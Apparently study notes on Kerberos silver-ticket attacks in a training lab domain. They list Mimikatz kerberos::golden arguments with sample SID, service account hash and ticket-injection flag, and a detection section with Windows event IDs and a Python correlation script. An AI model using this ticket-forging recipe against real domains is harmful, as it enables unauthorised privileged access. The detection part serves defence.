Silver Tickets

General

  • A valid TGS

  • Encrypted and signed with the NTLM hash (or AES key) of the target service account

  • Services rarely validate the PAC (Privilege Attribute Certificate)

  • A forged TGS grants access only to the specific service it was forged for, not to other services on the host

  • Reasonable persistence period (default 30 days for computer accounts, i.e. the machine account password change interval)

Exploitation

Arguments

  • kerberos::golden
    Name of the module (there is no Silver module; a silver ticket is forged with the same module by supplying the service account's key instead of the krbtgt key)

  • /domain:dollarcorp.moneycorp.local
    Domain FQDN

  • /sid:S-1-5-21-1874506631-3219952063-538504511
    SID of the domain

  • /target:dcorp-dc.dollarcorp.moneycorp.local
    Target server FQDN

  • /User:Administrator
    Username for which the ticket is generated

  • /id:500 /groups:512
    Optional user RID (default 500) and group RIDs (default 513 512 520 518 519)

  • /service:cifs
    The SPN service class of the target service for the TGS

  • /rc4:6f5b5acaf7433b3282ac22e21e62ff22
    NTLM (RC4) hash of the service/machine account (<MACHINE-NAME$>). Use /aes128 or /aes256 to supply AES keys instead.

  • /startoffset:0
    Optional offset, in minutes, for when the ticket becomes valid (default 0, i.e. now). Use a negative value for a ticket valid from the past and a positive value for one valid in the future.

  • /endin:600
    Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes.

  • /renewmax:10080
    Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 10080 minutes.

  • /ptt
    Injects the ticket into the current PowerShell process; there is no need to save the ticket to disk.

Commands

Getting Command Execution

Scheduled Tasks through HOST Service

WMI

Detection

  • Event IDs:

    • 4624: Account Logon

    • 4634: Account Logoff

    • 4672: Admin Logon
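One way to act on the event IDs above, as an added example that is not part of the original notes: a correlation check that flags privileged Kerberos network logons on a host (4624 with logon type 3 plus a 4672 for the same logon ID) for which no 4769 service-ticket request was logged on the domain controllers. This goes beyond the page's list by bringing in 4769, since a forged TGS is never requested from the KDC; the event records, field names, service account name and time window below are simplified constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (simplified Security-log fields), not real telemetry.
# Host side: two privileged Kerberos network logons, one legitimate, one forged.
HOST_EVENTS = [
    {"EventID": 4624, "Time": "2024-01-10T09:00:00", "TargetUserName": "Administrator",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "TargetLogonId": "0x3e7a1"},
    {"EventID": 4672, "Time": "2024-01-10T09:00:00", "SubjectUserName": "Administrator",
     "SubjectLogonId": "0x3e7a1"},
    {"EventID": 4624, "Time": "2024-01-10T09:05:00", "TargetUserName": "svc_backup",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "TargetLogonId": "0x3e7b2"},
    {"EventID": 4672, "Time": "2024-01-10T09:05:00", "SubjectUserName": "svc_backup",
     "SubjectLogonId": "0x3e7b2"},
    {"EventID": 4634, "Time": "2024-01-10T09:06:00", "TargetLogonId": "0x3e7b2"},
]
# DC side (all DCs merged): 4769 "A Kerberos service ticket was requested".
# ServiceName is the account holding the SPN, here the target host's machine account.
DC_EVENTS = [
    {"EventID": 4769, "Time": "2024-01-10T09:04:50",
     "TargetUserName": "svc_backup@DOLLARCORP.MONEYCORP.LOCAL", "ServiceName": "DCORP-DC$"},
]


def silver_ticket_candidates(host_events, dc_events, service_account, window_minutes=10):
    """Return (user, logon_id) pairs for privileged Kerberos network logons on the host
    that have no KDC-issued TGS for the same user and service within the time window."""
    window = timedelta(minutes=window_minutes)
    privileged = {e["SubjectLogonId"] for e in host_events if e["EventID"] == 4672}
    # Legitimate tickets leave a 4769 on some DC; index them by user and request time.
    issued = [(e["TargetUserName"].split("@")[0].lower(), datetime.fromisoformat(e["Time"]))
              for e in dc_events
              if e["EventID"] == 4769 and e["ServiceName"].lower() == service_account.lower()]
    flagged = []
    for e in host_events:
        if (e["EventID"] != 4624 or e["LogonType"] != 3
                or e["AuthenticationPackageName"] != "Kerberos"):
            continue
        if e["TargetLogonId"] not in privileged:  # only admin-level logons are of interest here
            continue
        user = e["TargetUserName"].lower()
        t = datetime.fromisoformat(e["Time"])
        if not any(u == user and abs(t - ti) <= window for u, ti in issued):
            flagged.append((user, e["TargetLogonId"]))
    return flagged


if __name__ == "__main__":
    print(silver_ticket_candidates(HOST_EVENTS, DC_EVENTS, "DCORP-DC$"))
```

The check only works when "Audit Kerberos Service Ticket Operations" is enabled on every DC and their logs are collected centrally; a missing DC feed produces false positives rather than misses.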
